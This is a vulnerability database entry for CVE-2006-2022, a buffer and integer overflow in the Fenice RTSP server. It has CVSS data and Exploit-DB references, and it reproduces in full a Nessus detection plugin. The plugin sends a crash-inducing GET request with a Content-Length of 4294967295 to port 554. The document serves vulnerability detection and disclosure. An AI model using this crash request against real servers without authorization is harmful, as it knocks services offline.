Vulnerabilities > CVE-2006-2022 - Remote Buffer Overflow and Denial Of Service vulnerability in Fenice

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
ls3
nessus
exploit available

Summary

Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.

Vulnerable Configurations

Part Description Count
Application
Ls3
1

Exploit-Db

  • descriptionFenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit. CVE-2006-2022. Remote exploit for linux platform
    idEDB-ID:1717
    last seen2016-01-31
    modified2006-04-25
    published2006-04-25
    reporterc0d3r
    sourcehttps://www.exploit-db.com/download/1717/
    titleFenice Oms 1.10 long get request Remote Buffer Overflow Exploit
  • descriptionFenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield). CVE-2006-2022. Remote exploit for linux platform
    idEDB-ID:3815
    last seen2016-01-31
    modified2007-04-29
    published2007-04-29
    reporterXpl017Elz
    sourcehttps://www.exploit-db.com/download/3815/
    titleFenice Oms server 1.10 - Remote Buffer Overflow Exploit exec-shield

Nessus

NASL familyGain a shell remotely
NASL idFENICE_110.NASL
descriptionThe remote host is running Fenice, an open source media streaming server for Linux / Unix. The version of Fenice installed on the remote host is affected by an integer overflow vulnerability involving requests with large values for the
last seen2020-06-01
modified2020-06-02
plugin id21610
published2006-05-27
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/21610
titleFenice <= 1.10 Multiple Remote Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(21610);
  script_version("1.17");

  script_cve_id("CVE-2006-2022", "CVE-2006-2023");
  script_bugtraq_id(17678);

  script_name(english:"Fenice <= 1.10 Multiple Remote Vulnerabilities");
  script_summary(english:"Tries to crash Fenice using large Content-Length");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote RTSP server suffers from multiple overflow issues." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Fenice, an open source media streaming
server for Linux / Unix. 

The version of Fenice installed on the remote host is affected by an
integer overflow vulnerability involving requests with large values
for the 'Content-Length' header and by a buffer overflow vulnerability
in its 'parse_url' function.  An unauthenticated, remote attacker can
exploit either flaw using a simple GET request to crash the affected
application and possibly to execute arbitrary code subject to the
privileges of the user id under which Fenice runs." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/431870/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/436256/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Fenice version 1.11 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/27");
 script_set_attribute(attribute:"patch_publication_date", value: "2006/06/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/04/23");
 script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value: "cpe:/a:ls3:fenice");
script_end_attributes();


  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");
  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
  script_dependencies("find_service2.nasl");
  script_require_ports("Services/rtsp", 554);

  exit(0);
}

include('global_settings.inc');
include('misc_func.inc');

port = get_service(svc: "rstp", default: 554);


# Try to crash it.
soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");

req = 'GET / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n';
send(socket:soc, data:req);
close(soc);


# There's a problem if the server's now down.
#
# nb: the server doesn't crash immediately.
sleep(2);

if (service_is_dead(port: port, exit: 1) > 0)
  security_hole(port);